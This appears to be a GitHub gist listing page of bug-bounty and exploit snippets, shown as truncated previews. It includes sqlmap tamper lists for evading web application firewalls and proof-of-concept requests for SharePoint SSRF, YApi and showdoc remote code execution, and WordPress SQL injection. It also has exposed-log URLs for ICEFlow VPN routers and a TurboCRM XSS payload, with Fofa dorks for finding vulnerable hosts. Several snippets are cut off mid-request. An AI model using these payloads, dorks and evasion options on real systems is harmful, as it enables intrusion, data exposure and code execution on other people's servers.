Description
This is a simple guide to perform javascript recon in the bugbounty
Steps
- The first step is to collect possibly several javascript files (
more files=more paths,parameters->more vulns)
pikpikcu
/ sqlmap tamper scripts
Created
September 13, 2022 12:49
— forked from sapran/sqlmap tamper scripts
sqlmap tamper scripts grouped by DBMS Copied from: https://prakash-khadka.com.np/wp-content/uploads/pdf/www-moonsec-com.pdf
View sqlmap tamper scripts
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # All scripts | |
| ``` | |
| --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords | |
| ``` | |
| # General scripts | |
| ``` | |
| --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes | |
| ``` | |
| # Microsoft access | |
| ``` |
pikpikcu
/ target BB
Created
March 3, 2022 22:31
— forked from marz-hunter/target BB
Large target BugBounty
View target BB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [ | |
| { | |
| "program_name": "(ISC)²", | |
| "policy_url": "https://bugcrowd.com/isc2", | |
| "submission_url": "https://bugcrowd.com/isc2/report", | |
| "launch_date": "", | |
| "bug_bounty": false, | |
| "swag": false, | |
| "hall_of_fame": true, | |
| "safe_harbor": "partial" |
pikpikcu
/ JavascriptRecon.md
Created
December 21, 2021 05:51
— forked from m4ll0k/JavascriptRecon.md
My Javascript Recon Process - BugBounty
View JavascriptRecon.md
pikpikcu
/ ICEFlow -disclosure.md
Created
August 12, 2021 10:09
ICEFlow VPN information disclosure vulnerability
View ICEFlow -disclosure.md
ICEFlow VPN information disclosure vulnerability
Fofa
title="ICEFLOW VPN Router"
POC:
http://REDACTED/log/system.log
http://REDACTED/log/vpn.log
http://REDACTED/log/access.log
View CVE-2021-31950.md
Microsoft SharePoint Server - GetXmlDataFromDataSource Server-Side Request Forgery Information Disclosure Vulnerability
POC:
POST /_vti_bin/webpartpages.asmx HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
SOAPAction: "http://microsoft.com/sharepoint/webpartpages/GetXmlDataFromDataSource"
Host: localhost
View YApi-RCE.md
POC YApi RCE:
Reference:
POC
Requests:
POST /api/user/reg HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
View poc wp.md
WordPress Plugin - Google Review Slider 6.1 SQL Injection
poc:
GET/wp-admin/admin.php?page=wp_google-templates_posts&tid=1&_wpnonce=***&taction=edit HTTP/1.1
sqlmap result:
sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests:
---
Parameter: tid (GET)
pikpikcu
/ showdoc-rce.md
Created
April 21, 2021 07:33
View showdoc-rce.md
POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Content-Length: 239
Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633
Accept-Encoding: gzip
----------------------------835846770881083140190633
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
pikpikcu
/ TurboCRM-XSS.md
Last active
December 1, 2022 06:34
View TurboCRM-XSS.md
TurboCRM Allow XSS (cross site scripting)
Dork
- https://fofa.so/result?qbase64=YXBwPSLnlKjlj4stVHVyYm9DUk0i
- https://fofa.so/result?qbase64=dGl0bGU9IueUqOWPiy1UdXJib0NSTSI%3D
Payloads
"><script>alert(/XSS/)</script>
Step To Reproduction
pikpikcu
/ ev-sites.txt
Created
March 24, 2021 06:38
— forked from ScottHelme/ev-sites.txt
Sites using EV in the Top 1 Million - 13th Sep 2019
View ev-sites.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 14 apple.com | |
| 40 vk.com | |
| 44 github.com | |
| 49 tumblr.com | |
| 55 dropbox.com | |
| 85 medium.com | |
| 87 paypal.com | |
| 92 icloud.com | |
| 100 booking.com | |
| 112 weebly.com |
NewerOlder